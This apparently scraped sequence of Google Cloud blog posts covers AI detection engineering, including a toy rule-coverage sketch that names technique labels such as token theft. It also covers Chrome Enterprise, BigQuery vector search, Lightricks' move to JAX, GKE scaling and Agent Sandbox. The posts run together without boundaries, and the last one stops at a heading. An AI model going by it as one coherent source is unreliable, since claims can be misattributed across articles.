Agentic Detection Engineering Workflow
Here’s how it works.
First, it ingests intelligence. The system automatically ingests detection opportunities from Google Threat Intelligence campaigns, which are sourced from Mandiant's frontline incident response engagements, our Managed Defense customers, and Google's unique global visibility. From thousands of raw sample events of adversary activity, Gemini extracts a distinct set of detection opportunities associated with the campaign.
Next, it generates synthetic events. An automated pipeline produces a corpus of high-fidelity, anonymized synthetic log events that accurately mimic the adversary tactics, techniques, and procedures (TTPs) described in the intelligence, providing a robust dataset for testing.
Then, it tests coverage. The system uses the synthetic data to exercise our existing detection rule set, providing a rapid, empirical answer to how well we are covered for a new threat.
After that, it accelerates rule creation. When coverage gaps are found, the process uses Gemini to automatically generate and evaluate new rules. Gemini drafts a new detection rule and provides a summary of its logic and expected performance, reducing the time to create a production-ready rule from days to hours.
Finally, it requires human review. The new rule is submitted to a human-in-the-loop security analyst, who vets and verifies it before deployment. AI has helped us transform a best-effort, manual process into a systematic, automated workflow. By tying new detections directly to the intelligence campaigns they cover, we can help you be prepared for the latest threats.
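To make the flow easier to follow, here is a purely illustrative, self-contained Python sketch of the five-step loop. Every function, field, and value below is a hypothetical placeholder, not part of the Google Security Operations API.

# Illustrative only: a toy version of the agentic detection-engineering loop.

def extract_detection_opportunities(campaign):
    # Step 1: Gemini distills distinct detection opportunities from raw samples.
    return list(dict.fromkeys(campaign["ttps"]))

def generate_synthetic_events(opportunities):
    # Step 2: produce anonymized, high-fidelity synthetic events per opportunity.
    return [{"ttp": opportunity, "synthetic": True} for opportunity in opportunities]

def is_covered(event, rule_corpus):
    # Step 3: empirically test the existing rule set against the synthetic data.
    return event["ttp"] in rule_corpus

def draft_rule(event):
    # Step 4: Gemini drafts a candidate rule plus a summary of its logic.
    return {"rule_for": event["ttp"], "summary": "auto-drafted, pending review"}

def analyst_approves(rule):
    # Step 5: human-in-the-loop review before deployment.
    return True

campaign = {"id": "CAMPAIGN-123", "ttps": ["powershell-download", "oauth-token-theft"]}
existing_rules = {"powershell-download"}

events = generate_synthetic_events(extract_detection_opportunities(campaign))
gaps = [event for event in events if not is_covered(event, existing_rules)]
approved = [draft_rule(event) for event in gaps if analyst_approves(draft_rule(event))]
print(f"{len(gaps)} coverage gap(s) found; {len(approved)} new rule(s) ready to deploy")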
“The real strategic shift is moving past those single indicators to systematically detecting underlying adversary behaviors — that’s how we get ahead and stay ahead. Out-of-box behavioral rules, based on Google’s deep intel visibility, help us get there,” said Ron Smalley, senior vice-president and head of Cybersecurity Operations, Fiserv.
The way we work is rapidly transforming, and AI is quickly becoming a connection point across workflows and tasks both big and small. Whether it's saving time by converting automated meeting notes into a follow-up email to a client, or getting help brainstorming your next big campaign idea, generative AI, driven by models like Gemini, offers seamless, intelligent help for employees. Google brings the power of AI into every work surface, from the browser to the operating system to core work applications, across an expanding collection of new devices.
So how does this come to life for our customers? Our platforms like Chrome Enterprise, the most trusted enterprise browser, and Android, the flexible OS that powers mobile and beyond, have hundreds of millions of business users relying on these technologies at work, and AI continues to make them more helpful for the workforce.
Hardware like Google Pixel and Chromebook Plus devices is infused with AI, built for these new AI experiences, and already growing in adoption among businesses. But it doesn't stop there. We're also expanding to new surfaces with Android XR, the extended reality operating system for next-gen headsets and smart glasses. And Google Beam, our AI-first video communication platform, is redefining how we connect.
Together, Google's enterprise platforms and devices are built for the connected future.
Let’s look at how this comes together with recent and exciting new capabilities for enterprises:
Empowering your employees to work smarter and be more productive
Across our platforms and devices, we're offering familiar user experiences, so employees get the right apps and information they need, whether that's Google's productivity apps, third-party SaaS apps, custom apps, or even legacy apps. And we make sure that help from Gemini is just a tap, click, or prompt away.
To help organizations continue to move towards a more modern endpoint computing experience, we’re excited to announce the general availability of Cameyo by Google, allowing users to run any application, legacy or modern, side-by-side. Built in the cloud as part of the Google enterprise stack, Cameyo delivers a seamless, web-based experience for users and eliminates complexity for IT.
We recently announced Gemini in Chrome, an AI browsing assistant that enables end users to work more efficiently. It can be used to quickly summarize long reports or documents, grab key information from a video or brainstorm ideas for a new project. Gemini in Chrome can understand the context of a user’s tabs, and recall recent tabs they had open. By combining Gemini in Chrome with an app virtualized by Cameyo, organizations can bring the helpfulness of AI to legacy apps on the web.
Gemini in Chrome is available with enterprise-grade protections to Google Workspace customers, giving IT and security teams control over how their users use AI. These capabilities are already rolling out to Android, iOS, Mac, and Windows users. We're excited to announce that in addition to the built-in Gemini capabilities on ChromeOS, these Gemini in Chrome capabilities will also be available to Workspace customers on their Chromebook and Chromebook Plus devices soon.
Endpoints for a new work era
Organizations need devices that are purpose-built for the AI era, with powerful hardware and AI integrations directly in the operating system. Google is integrating Gemini and Google AI across a wide set of devices and form factors to deliver a consistent experience, wherever work happens.
Chromebook Plus provides a line of devices designed with more powerful hardware to deliver AI-powered experiences at a great value. This year, we launched new features like Text capture and Select to search with Lens. We also launched two new devices, the Lenovo Chromebook Plus 14” and the Acer Chromebook Plus Spin 514, equipped with MediaTek processors whose NPUs deliver up to 50 TOPS. We will continue to bring powerful laptop experiences to support the needs of workers today and into the future.
Similarly, employees need the flexibility to be productive, especially on the go. Google Pixel uses on-device AI through Gemini Nano to enable features such as offline summarization in the Recorder app,1 Call Notes,2 Magic Cue,3 Live Translate (Voice)4 and more. Additionally, features like Gemini Live5 with screen sharing and camera sharing help bring new levels of productivity to users on the go.
We’re also starting to see new emerging form factors like extended reality (XR) as ways to extend our workplace. The introduction of Android XR marks a major shift for the modern enterprise, extending the reach of contextual AI beyond mobile devices and into the physical workspace. This platform, running on a new ecosystem of headsets and smart glasses, integrates Gemini to provide a true hands-free, contextual assistant. For employees in fields like field service, manufacturing, healthcare, or logistics, this means real-time, heads-up support overlaid onto their view of the world. For example, a technician could receive step-by-step repair instructions or access complex schematics on an optional in-lens display while keeping both hands on the equipment.
Improving security controls and visibility
For IT teams, we know the need for visibility and protection is greater than ever. We're delivering security intelligence and flexible management to AI-powered end user computing environments.
Comprehensive data protection at the browser and OS level is crucial for navigating today’s evolving threat landscape, especially with the rise of AI services. To deliver this essential protection where work primarily happens, within the browser, we’ve embedded robust data loss prevention directly into Chrome Enterprise Premium. This provides IT and security teams with an extensive, easily configurable set of tools in Chrome to proactively guard against accidental or intentional data loss across all web applications.
We’ve expanded many of the data loss prevention capabilities to mobile platforms as well. Admins now can:
Audit, warn or block access to sites or categories of sites on iOS or Android
Set limitations on copying and pasting sensitive data on mobile
Restrict downloads including when users are in Incognito mode
Provision client certificates to Chrome managed profiles on Android; this capability is coming to iOS soon
Organizations leveraging Google’s security ecosystem can now benefit from a new one-click integration with Google SecOps. This integration delivers unprecedented browser intelligence, including data loss events and risky activity, to SecOps, empowering security teams to conduct more thorough investigations and make faster, better-informed decisions.
The rapid rise of Generative AI, powered by Gemini, fundamentally changes what we expect from our enterprise technology, offering seamless, intelligent assistance across every workflow. Google is committed to delivering a unified vision, ensuring this help is immediately available by empowering your employees across every surface—from Chrome and Android to web applications virtualized by Cameyo by Google. By creating endpoints built for the AI era like Chromebook Plus and extending the workplace with Android XR, we ensure powerful hardware and AI integrations go hand-in-hand. Discover how you can equip your teams for the future with Chrome Enterprise, ChromeOS, and Cameyo.
1Available on select devices, languages, and countries. Works with compatible accounts and some features may not be available based on corporate account settings. Check responses for accuracy.
2Available in select countries and languages. Available to 18+ users. Availability may vary by account and profile type.
3Works on calls at least 30 seconds long. Not available in all languages or countries. Requires compatible Pixel phone. See here for more details.
4Results may vary. Check responses for accuracy. Available in select countries and languages.
5 Results for illustrative purposes and may vary. Check responses for accuracy. Compatible with certain features and accounts. Internet connection required. Available in select countries, languages, and to users 18+. Availability may vary by account and profile type.
Embeddings are a crucial component at the intersection of data and AI. As data structures, they encode the inherent meaning of the data they represent, and their significance becomes apparent when they are compared to one another. Vector search is a technique that uncovers the relative meaning of those embeddings by evaluating the distances between them within a shared space.
In early 2024, we launched vector search in the BigQuery data platform, making its powerful capabilities accessible to all BigQuery users. This effectively eliminated the need for specialized databases or complex AI workflows. Our ongoing efforts to democratize vector search have resulted in a unique approach that provides the scale, simplicity, and cost performance that BigQuery users expect. In this article, we reflect on the past two years, sharing insights gained from product development and customer interactions.
In the before-times: Building vector search the hard way
Before we added native support for vector search in BigQuery, building a scalable vector search solution was a complex, multi-step process. Data professionals had to:
Extract data from their data warehouse
Generate embeddings using specialized machine learning infrastructure
Load the embeddings into a dedicated vector database
Maintain this additional infrastructure, including server provisioning, scaling, and index management
Develop custom pipelines to join vector search results back to their core business data
Deal with downtime during index rebuilds, a critical pain point for production systems
This disjointed, expensive, and high-maintenance architecture was a barrier to entry for many teams.
In the beginning: Focus on simplicity
We kicked off BigQuery vector search with one goal: to make the simplest vector database on the market. We built it to meet some core design requirements:
It needs to be fully serverless: We knew early on that the best way to bring vector search to all BigQuery customers was to make it serverless. We first built the IVF index, combining the best of clustering and indexing, all within BigQuery. As a result, you don’t need to provision any new servers whatsoever to use vector search in BigQuery. This means you don’t have to manage any underlying infrastructure for your vector database, freeing up your team to focus on what matters most: your data. BigQuery handles the scaling, maintenance, and reliability automatically. It can scale effortlessly to handle billions of embeddings, so your solution can grow with your business.
Index maintenance should be as simple as possible: BigQuery's vector indexes are a key part of this simplicity. You create an index with a simple CREATE VECTOR INDEX SQL statement (see the sketch after this list), and BigQuery handles the rest. As new data is ingested, the index automatically and asynchronously refreshes to reflect the changes. And if newly ingested data shifts the data distribution and degrades search accuracy, that's no problem: you can use the Model Rebuild feature to completely rebuild your index, with no index downtime and just one SQL statement.
It should be integrated with GoogleSQL and Python: You can perform vector searches directly within your existing SQL workflows using a simple VECTOR_SEARCH function. This makes it easy to combine semantic search with traditional queries and joins. For data scientists, the integration with Python and tools like LangChain and BigQuery DataFrames makes it a natural fit for building advanced machine learning applications.
Consistency needs to be guaranteed: New data is searchable via the VECTOR_SEARCH function immediately after ingestion, providing accuracy and consistency of the search results.
You only pay for what you use: The BigQuery vector search pricing model is designed for flexibility. This “pay as you go” model is great for both ad-hoc analyses and highly price-performant batch queries. This model emphasizes the ease of trying out the feature without a significant upfront investment.
Security is a given: BigQuery's security infrastructure offers robust data-access control through row-level security (RLS) and column-level security (CLS). This multi-layered approach guarantees that users can only access authorized data, thereby bolstering protection and ensuring compliance.
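To make these building blocks concrete, here is a minimal sketch, run from Python through the BigQuery client, that creates an IVF index and queries it with VECTOR_SEARCH. The dataset and table names are hypothetical placeholders; consult the documentation for the full set of index and search options.

from google.cloud import bigquery

client = bigquery.Client()

# Hypothetical dataset/table names; `embedding` is an ARRAY<FLOAT64> column.
client.query("""
    CREATE VECTOR INDEX IF NOT EXISTS product_embedding_idx
    ON mydataset.products(embedding)
    OPTIONS (index_type = 'IVF', distance_type = 'COSINE')
""").result()

# Each row of the query table is matched against the indexed base table.
rows = client.query("""
    SELECT query.id AS query_id, base.id AS product_id, distance
    FROM VECTOR_SEARCH(
      TABLE mydataset.products, 'embedding',
      TABLE mydataset.search_queries, 'embedding',
      top_k => 5, distance_type => 'COSINE')
""").result()

for row in rows:
    print(row.query_id, row.product_id, row.distance)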
The early days: Growing with our customers
As customers found success with early projects and moved more data into BigQuery, they told us about many data science workflows that they were “updating” to use new embedding-based approaches. Here are a few examples of the various applications that vector search can enhance:
LLM applications with retrieval augmented generation (RAG): By providing relevant business data, vector search helps ensure accurate and grounded responses from large language models.
Semantic search on business data: Enable powerful, natural-language search capabilities for both internal and external users. For instance, a marketing team could search for “customers who have a similar purchasing history to Jane” and receive a list of semantically similar customer profiles.
Customer 360 and deduplication: Use embeddings to identify similar customer records, even if details like names or addresses differ slightly. This is an effective way to cleanse and consolidate data for a more accurate, single view of your customer.
Log analytics and anomaly detection: Ingest log data as embeddings and use vector search to quickly find similar log entries, even if the exact text doesn’t match. This helps security teams identify potential threats and anomalies much faster.
Enhance product recommendations: Suggest visually or textually similar items (e.g., clothing) or semantically related complementary products.
Where we are now: Improving scale and cost performance
As customer usage grew, we enhanced our offering, observing significant demand for batch processing beyond RAG and generative AI workloads. Unlike traditional vector databases, batch vector search in BigQuery excels at high-throughput, analytical similarity searches on massive datasets. This allows data scientists to analyze billions of records simultaneously within their existing data environment, enabling previously prohibitive tasks such as:
Large-scale clustering: Grouping every customer in a database based on their behavioral embeddings
Comprehensive anomaly detection: Finding the most unusual transaction for every single account in a financial ledger
Bulk item categorization: Classifying millions of text documents or product images simultaneously
In the second phase of development, we launched many new features to further improve the vector search experience:
TreeAH, built on the ScaNN index, provides significant product differentiation in price-performance. As our customers' data science teams moved more of their recommendation, clustering, and data pipelines to vector search, we saw great improvements with TreeAH (see the sketch after this list).
Various internal improvements to training and indexing performance and usability. For example, we added asynchronous index training, which improves usability and scalability by moving massive index training jobs into the background, and we made further optimizations that improve indexing performance and reduce indexing latency without incurring additional costs for users.
Stored columns to help improve vector search performance:
Users can apply prefilters on the stored columns in the vector search query to greatly optimize search performance without sacrificing search accuracy.
If users only query stored columns in the vector search query, search performance can be further improved by avoiding expensive joins with the base table.
Partitioned indexes to dramatically reduce I/O costs and accelerate query performance by skipping irrelevant partitions. This is especially powerful for customers who frequently filter on partitioning columns, such as a date or region.
Index model rebuilds to help ensure that vector search results remain accurate and relevant over time. As your base data evolves, you can now proactively correct for model drift, maintaining the high performance of your vector search applications without index downtime.
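As a rough illustration of how several of these features combine, the following hypothetical sketch creates a TreeAH index with stored columns and applies a prefilter inside VECTOR_SEARCH. Table names, columns, and the exact STORING and prefilter forms are assumptions to verify against the current documentation.

from google.cloud import bigquery

client = bigquery.Client()

# Hypothetical names: a TreeAH (ScaNN-based) index with stored columns, so
# filters and selected columns can be served without joining the base table.
client.query("""
    CREATE OR REPLACE VECTOR INDEX product_treeah_idx
    ON mydataset.products(embedding)
    STORING (category, price)
    OPTIONS (index_type = 'TREE_AH', distance_type = 'COSINE')
""").result()

# A prefilter on a stored column, expressed as a subquery over the base table.
rows = client.query("""
    SELECT base.category, base.price, distance
    FROM VECTOR_SEARCH(
      (SELECT * FROM mydataset.products WHERE category = 'shampoo'),
      'embedding',
      TABLE mydataset.search_queries, 'embedding',
      top_k => 10)
""").result()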
Looking ahead: Indexing all the things
As businesses look to agentic AI, the data platform has never been more important. We imagine a world in which every business has its own AI mode for productivity, with relevant-data retrieval at its heart: intelligent indexing of all relevant enterprise data, structured or unstructured, to automate AI and analytics. Indexing and search are core to Google. We look forward to sharing relevant technology innovations with you!
Training large video diffusion models at scale isn’t just computationally expensive — it can become impossible when your framework can’t keep pace with your ambitions.
JAX has become a popular computational framework across AI applications, now recognized for its capabilities in training large-scale AI models, such as LLMs and life sciences models. Its strength lies not just in performance but in an expressive, scalable design that gives innovators the tools to push the boundaries of what’s possible. We’re consistently inspired by how researchers and engineers leverage JAX’s ecosystem to solve unique, domain-specific challenges — including applications for generative media.
Today, we’re excited to share the story of Lightricks, a company at the forefront of the creator economy. Their LTX-Video team is building high-performance video generation models, and their journey is a masterclass in overcoming technical hurdles. I recently spoke with Yoav HaCohen and Yaki Bitterman, who lead the video and scaling teams, respectively. They shared their experience of hitting a hard scaling wall with their previous framework and how a strategic migration to JAX became the key to unlocking the performance they needed.
Here, Yoav and Yaki tell their story in their own words. – Srikanth Kilaru, Senior Product Manager, Google ML Frameworks
The creator’s challenge
At Lightricks, our goal has always been to bring advanced creative technology to consumers. With apps like Facetune, we saw the power of putting sophisticated editing tools directly into people’s hands. When generative AI emerged, we knew it would fundamentally change content creation.
We launched LTX Studio to build generative video tools that truly serve the creative process. Many existing models felt like a “prompt and pray” experience, offering little control and long rendering times that stifled creativity. We needed to build our own models—ones that were not only efficient but also gave creators the controllability they deserve.
Our initial success came from training our first real-time video generation model on Google Cloud TPUs with PyTorch/XLA. But as our ambitions grew, so did the complexity. When we started developing our 13-billion-parameter model, we hit a wall.
Hitting the wall and making the switch
Our existing stack wasn't delivering the training step times and scalability we needed. After exploring optimization options, we decided to shift our approach. We paused development to rewrite our entire training codebase in JAX, and the results were immediate. Switching to JAX felt like a magic trick, instantly delivering the runtime performance we needed.
This transition enabled us to effectively scale our tokens per sample (the amount of data processed in each training step), model parameters, and chip count. With JAX, sharding strategies (sharding divides large models across multiple chips) that previously failed now work out of the box on both small and large pods (clusters of TPU chips).
These changes delivered linear scaling that translates to 40% more training steps per day — directly accelerating model development and time to market. FlashAttention and data loading, which had been sources of critical issues, also worked reliably. As a result, our team's productivity skyrocketed, doubling the number of pull requests we could merge in a week.
Why JAX worked: A complete ecosystem for scale
The success wasn’t just about raw speed; it was about the entire JAX stack, which provided the building blocks for scalable and efficient research.
A clear performance target with MaxText: We used the open-source MaxText framework as a baseline to understand what acceptable performance looked like for a large model on TPUs. This gave us a clear destination and the confidence that our performance goals were achievable on the platform.
A robust toolset: We built our new stack on the core components of the JAX ecosystem based on the MaxText blueprint. We used Flax for defining our models, Optax for implementing optimizers, and Orbax for robust checkpointing — all core components that work together natively.
Productive development and testing: The transition was remarkably smooth. We implemented unit tests to compare our new JAX implementation with the old one, ensuring correctness every step of the way. A huge productivity win was discovering that we could test our sharding logic on a single, cheap CPU before deploying to a large TPU slice (see the sketch after this list). This allowed for rapid, cost-effective iteration.
Checkpointing reliability: For sharded models, JAX’s checkpointing is much more reliable than before, making training safer and more cost-effective.
Compile speed & memory: JAX compilation with lax.fori_loop is fast and uses less memory, freeing capacity for tokens and gradients.
Smooth scaling on a supercomputer: With our new JAX codebase, we were able to effectively train on a reservation of thousands of TPU cores. We chose TPUs because Google provides access to what we see as a “supercomputer” — a fully integrated system where the interconnects and networking were designed first, not as an afterthought. We manage these large-scale training jobs with our own custom Python scripts on Google Compute Engine (GCE), giving us direct control over our infrastructure. We also use Google Cloud Storage and stream the training data to the TPU virtual machines.
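As a concrete illustration of the CPU-first sharding workflow mentioned in the list above, here is a minimal sketch, not Lightricks' actual code, that exposes eight fake devices on a single CPU host so NamedSharding logic can be validated before a job ever touches a TPU slice.

import os
# Must be set before importing jax: expose 8 fake CPU devices on one host.
os.environ["XLA_FLAGS"] = "--xla_force_host_platform_device_count=8"

import jax
import jax.numpy as jnp
from jax.experimental import mesh_utils
from jax.sharding import Mesh, NamedSharding, PartitionSpec as P

# A 2x4 mesh over the fake devices, mirroring a (data, model) layout.
mesh = Mesh(mesh_utils.create_device_mesh((2, 4)), axis_names=("data", "model"))

x = jnp.ones((16, 1024))
x = jax.device_put(x, NamedSharding(mesh, P("data", "model")))

@jax.jit
def layer(x):
    return jnp.tanh(x @ jnp.ones((1024, 1024)))

y = layer(x)
print(y.sharding)  # inspect the inferred output sharding before scaling up to TPUs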
Architectural diagram showing the Lightricks stack
Build your models with the JAX ecosystem
Lightricks’ story is a great example of how JAX’s powerful, modular, and scalable design can help teams overcome critical engineering hurdles. Their ability to quickly pivot, rebuild their stack, and achieve massive performance gains is a testament to both their talented team and the tools at their disposal.
The JAX team at Google is committed to supporting innovators like Lightricks and the entire scientific computing community.
Share your story: Are you using JAX to tackle a challenging scientific problem? We would love to learn how JAX is accelerating your research.
Help guide our roadmap: Are there new features or capabilities that would unlock your next breakthrough? Your feature requests are essential for guiding the evolution of JAX.
Please reach out to the team via GitHub to share your work or discuss what you need from JAX. Check out documentation, examples, news, events and more at jaxstack.ai and jax.dev.
Sincere thanks to Yoav, Yaki, and the entire Lightricks team for sharing their insightful journey with us. We’re excited to see what they create next.
The past decade of cloud native infrastructure has been defined by relentless change — from containerization and microservices to the rise of generative AI. Through every shift, Kubernetes has been the constant, delivering stability and a uniform, scalable operational model for both applications and infrastructure.
As Google Kubernetes Engine (GKE) celebrates its 10th anniversary, its symbiotic relationship with Kubernetes has never been more important. With the increasing demand for Kubernetes to handle AI at its highest scale, Google continues to invest in strengthening Kubernetes’ core capabilities, elevating all workloads — AI and non-AI alike. At KubeCon North America this year, we’re announcing major advancements that reflect our holistic three-pronged approach:
Elevate core Kubernetes OSS for next-gen workloads – This includes proactively supporting the agentic wave with our new Kubernetes-native Agent Sandbox APIs for security, governance, and isolation. Recently, we also added several capabilities to power inference workloads, such as the Inference Gateway API and Inference Perf. In addition, capabilities such as the Buffers API and HPA improvements help address provisioning latency from different angles for all workloads.
Provide GKE as the reference implementation for managed Kubernetes excellence – We continuously bring new features and best practices directly to GKE, translating our Kubernetes expertise into a fully managed, production-ready platform that integrates powerful Google Cloud services and provides unmatched scale and security. We are excited to announce the new GKE Agent Sandbox, and we recently announced GKE custom compute classes, GKE Inference Gateway, and GKE Inference Quickstart. And to meet the demand for massive computation, we are pushing the limits of scale, with support for 130k-node clusters. This year, we're also thrilled to announce our participation in the new CNCF Kubernetes AI Conformance program, which simplifies AI/ML on Kubernetes with a standard for cluster interoperability and portability. GKE is already certified as an AI-conformant platform.
Drive frameworks and reduce operational friction – We actively collaborate with the open-source community and partners to enhance support for new frameworks, including Slurm and Ray on Kubernetes. We recently announced optimized open-source Ray for GKE with RayTurbo in collaboration with Anyscale. More recently, we became a founding contributor to llm-d, an open-source project in collaboration with partners to create a distributed, Kubernetes-native control plane for high-performance LLM inference at scale.
Now let’s take a deeper look at the advancements.
Supporting the agentic wave
The Agentic AI wave is upon us. According to PwC, 79% of senior IT leaders are already adopting AI agents, and 88% plan to increase IT budgets in the next 12 months due to agentic AI.
Kubernetes already provides a robust foundation for deploying and managing agents at scale, yet the non-deterministic nature of agentic AI workloads introduces infrastructure challenges. Agents are increasingly capable of writing code, controlling computer interfaces and calling a myriad of tools, raising the stakes for isolation, efficiency, and governance.
We’re addressing these challenges by evolving Kubernetes’ foundational primitives while providing high performance and compute efficiency for agents running on GKE. Today, we announced Agent Sandbox, a new set of capabilities for Kubernetes-native agent code execution and computer use environments, available in preview. Designed as open source from the get-go, Agent Sandbox relies on gVisor to isolate agent environments, so you can confidently execute LLM-generated code and interact with your AI agents.
For an even more secure and efficient managed experience, the new GKE Agent Sandbox enhances this foundation with built-in capabilities such as integrated sandbox snapshots and container-optimized compute. Agent Sandbox delivers sub-second latency for fully isolated agent workloads, up to a 90% improvement over cold starts. For more details, please refer to this detailed announcement on Supercharging Agents on GKE today.
Unmatched scale for the AI gigawatt era
In this ‘Gigawatt AI era,’ foundational model creators are driving demand for unprecedented computational power. Based on internal testing of our experimental-mode stack, we are excited to share that we used GKE to create the largest known Kubernetes cluster, with 130,000 nodes.
At Google Cloud, we’re also focusing on single-cluster scalability for tightly coupled jobs, developing multi-cluster orchestration capabilities for job sharding (e.g., MultiKueue), and designing new approaches for dynamic capacity reallocation — all while extending open-source Kubernetes APIs to simplify AI platform development and scaling. We are heavily investing into the open-source ecosystem of tools behind AI at scale (e.g. Kueue, JobSet, etcd), while making GKE-specific integrations to our data centers to offer the best performance and reliability (e.g., running the GKE control plane on Spanner). Finally, we’re excited to open-source our Multi-Tier Checkpointing (MTC) solution, designed to improve the efficiency of large-scale AI training jobs by reducing lost time associated with hardware failures and slow recovery from saved checkpoints.
Better compute for every workload
Our decade-long commitment to Kubernetes is rooted in making it more accessible and efficient for every workload. However, through the years, one key challenge has remained: when using autoscaling, provisioning new nodes took several minutes — not fast enough for high-volume, fast-scale applications. This year, we addressed this friction head-on, with a variety of enhancements in support of our mission: to provide near-real-time scalable compute capacity precisely when you need it, all while optimizing price and performance.
Autopilot for everyone
We introduced the container-optimized compute platform — a completely reimagined autoscaling stack for GKE Autopilot. As the recommended mode of operation, Autopilot fully automates your node infrastructure management and scaling, with dramatic performance and cost implications. As Jia Li, co-founder at LiveX AI shared, “LiveX AI achieves over 50% lower TCO, 25% faster time-to-market, and 66% lower operational cost with GKE Autopilot.” And with the recent GA of Autopilot compute classes for Standard clusters, we made this hands-off experience accessible to more developers, allowing you to adopt Autopilot on a per-workload basis.
Tackling provisioning latency from every angle
We introduced faster concurrent node pool auto-provisioning, making operations asynchronous and highly parallelized. This simple change dramatically accelerates cluster scaling for heterogeneous workloads, improving deployment latency many times over in our benchmarks. Then, for demanding scale-up needs, the new GKE Buffers API (OSS) allows you to request a buffer of pre-provisioned, ready-to-use nodes, making compute capacity available almost instantaneously. And once the node is ready, the new version of GKE container image streaming gets your applications running faster by allowing them to start before the entire container image is downloaded, a critical boost for large AI/ML and data-processing workloads.
Non-disruptive autoscaling to improve resource utilization
The quest for speed extends to workload-level scaling.
The HPA Performance Profile is now enabled by default on new GKE Standard clusters. This brings massive scaling improvements — including support for up to 5,000 HPA objects and parallel processing — for faster, more consistent horizontal scaling.
We’re tackling disruptions in vertical scaling with the preview of VPA with in-place pod resize, which allows GKE to automatically resize CPU and memory requests for your containers, often without needing to recreate the pod.
Dynamic hardware efficiency
Finally, our commitment to dynamic efficiency extends to hardware utilization. GKE users now have access to:
New N4A VMs based on Google Axion Processors (now in preview) and N4D VMs based on 5th Gen AMD EPYC Processors (now GA). Both support Custom Machine Types (CMT), letting you create right-sized nodes that are matched to your workloads.
New GKE custom compute classes, allowing you to define a prioritized list of VM instance types, so your workloads automatically use the newest, most price-performant options with no manual intervention.
A platform to power AI Inference
The true challenge of generative AI inference: how do you serve billions of tokens reliably, at lightning speed, and without bankrupting the organization?
Unlike web applications, serving LLMs is both stateful and computationally intensive. To address this, we have driven extensive open-source investments in Kubernetes, including the Gateway API Inference Extension for LLM-aware routing; the inference performance project, which provides a benchmarking standard for meticulous model performance insights on accelerators, along with HPA scaling metrics and thresholds; and Dynamic Resource Allocation (developed in collaboration with Intel and others), which streamlines and automates the allocation and scheduling of GPUs, TPUs, and other devices to pods and workloads within Kubernetes. We also formed the llm-d project with Red Hat and IBM to create a Kubernetes-native distributed inference stack that optimizes for the "time to reach SOTA architectures."
On the GKE side we recently announced the general availability of GKE Inference Gateway, a Kubernetes-native solution for serving AI workloads. It is available with two workload-specific optimizations:
LLM-aware routing for applications like multi-turn chat, which routes requests to the same accelerators to use cached context, avoiding latency spikes
Disaggregated serving, which separates the “prefill” (prompt processing) and “decode” (token generation) stages onto separate, optimized machine pools
As a result, GKE Inference Gateway now achieves up to 96% lower Time-to-First-Token (TTFT) latency and up to 25% lower token costs at peak throughput when compared to other managed Kubernetes services.
Startup latency for AI inference servers is a consistent challenge, with large models taking tens of minutes to start. Today, we're introducing GKE Pod Snapshots, which drastically improves startup latency by enabling CPU and GPU workloads to be restored from a memory snapshot. GKE Pod Snapshots reduces AI inference start-up time by as much as 80%, loading 70B-parameter models in just 80 seconds and 8B-parameter models in just 16 seconds.
No discussion of inference is complete without talking about the complexity, cost, and difficulty of deploying production-grade AI infrastructure. GKE Inference Quickstart provides a continuous, automated benchmarking system kept up to date with the latest accelerators in Google Cloud, the latest open models, and inference software. You can use these benchmarked profiles to save significant time qualifying, configuring, and deploying, as well as monitoring inference-specific performance metrics and dynamically fine-tuning your deployment. You can find this data in this colab notebook.
Here’s to the next decade of Kubernetes and GKE
As GKE celebrates a decade of foundational work, we at Google are proud to help lead the future, and we know it can only be built together. Kubernetes would not be where it is today without the efforts of its contributor community. That includes everyone from members writing foundational new features to those doing the essential, daily work — the “chopping wood and carrying water” — that keeps the project thriving.
We invite you to explore new capabilities, learn more about exciting announcements such as Ironwood TPUs, attend our deep-dive sessions, and join us in shaping the future of open-source infrastructure.
Google and the cloud-native community have consistently strengthened Kubernetes to support modern applications. At KubeCon EU 2025 earlier this year, we announced a series of enhancements to Kubernetes to better support AI inference. Today, at KubeCon NA 2025, we’re focused on making Kubernetes the most open and scalable platform for AI agents, with the introduction of Agent Sandbox.
Consider the challenge that AI agents represent. AI agents help applications go from answering simple queries to performing complex, multi-step tasks to achieve the user's objective. Given a request like "visualize last quarter's sales data," the agent has to use one tool to query the data and another to turn that data into a graph before returning it to the user. Where traditional software is predictable, AI agents can make their own decisions about when and how to use the tools at their disposal to achieve a user's objective, including generating code, using computer terminals, and even browsers.
Without strong security and operational guardrails, orchestrating powerful, non-deterministic agents can introduce significant risks. Providing kernel-level isolation for agents that execute code and commands is non-negotiable. AI and agent-based workloads also have additional infrastructure needs compared to traditional applications. Most notably, they need to orchestrate thousands of sandboxes as ephemeral environments, rapidly creating and deleting them as needed while ensuring they have limited network access.
With its maturity, security, and scalability, we believe Kubernetes provides the most suitable foundation for running AI agents. Yet it still needs to evolve to meet the needs of agent code execution and computer use scenarios. Agent Sandbox is a powerful first step in that direction.
Strong isolation at scale
Agentic code execution and computer use require an isolated sandbox to be provisioned for each task. Further, users expect infrastructure to keep pace even as thousands of sandboxes are scheduled in parallel.
At its core, Agent Sandbox is a new Kubernetes primitive built with the Kubernetes community that’s designed specifically for agent code execution and computer use, delivering the performance and scale needed for the next generation of agentic AI workloads. Foundationally built on gVisor with additional support for Kata Containers for runtime isolation, Agent Sandbox provides a secure boundary to reduce the risk of vulnerabilities that could lead to data loss, exfiltration or damage to production systems. We’re continuing our commitment to open source, building Agent Sandbox as a Cloud Native Computing Foundation (CNCF) project in the Kubernetes community.
Enhanced performance on GKE
At the same time, you need to optimize performance as you scale your agents to deliver the best agent user-experience at the lowest cost. When you use Agent Sandbox on Google Kubernetes Engine (GKE), you can leverage managed gVisor in GKE Sandbox and the container-optimized compute platform to horizontally scale your sandboxes faster. Agent Sandbox also enables low-latency sandbox execution by enabling administrators to configure pre-warmed pools of sandboxes. With this feature, Agent Sandbox delivers sub-second latency for fully isolated agent workloads, up to a 90% improvement over cold starts.
The same isolation that makes a sandbox safe also makes it more susceptible to compute underutilization. Reinitializing each sandbox environment with a script can be brittle and slow, and idle sandboxes often waste valuable compute cycles. In a perfect world, you could take a snapshot of running sandbox environments and start them from a specific state.
Pod Snapshots is a new, GKE-exclusive feature that enables full checkpoint and restore of running pods. Pod Snapshots drastically reduces startup latency of agent and AI workloads. When combined with Agent Sandbox, Pod Snapshots lets teams provision sandbox environments from snapshots, so they can start up in seconds. GKE Pod Snapshots supports snapshot and restore of both CPU- and GPU-based workloads, bringing pod start times from minutes down to seconds. With Pod Snapshots, any idle sandbox can be snapshotted and suspended, saving significant compute cycles with little to no disruption for end-users.
Built for AI engineers
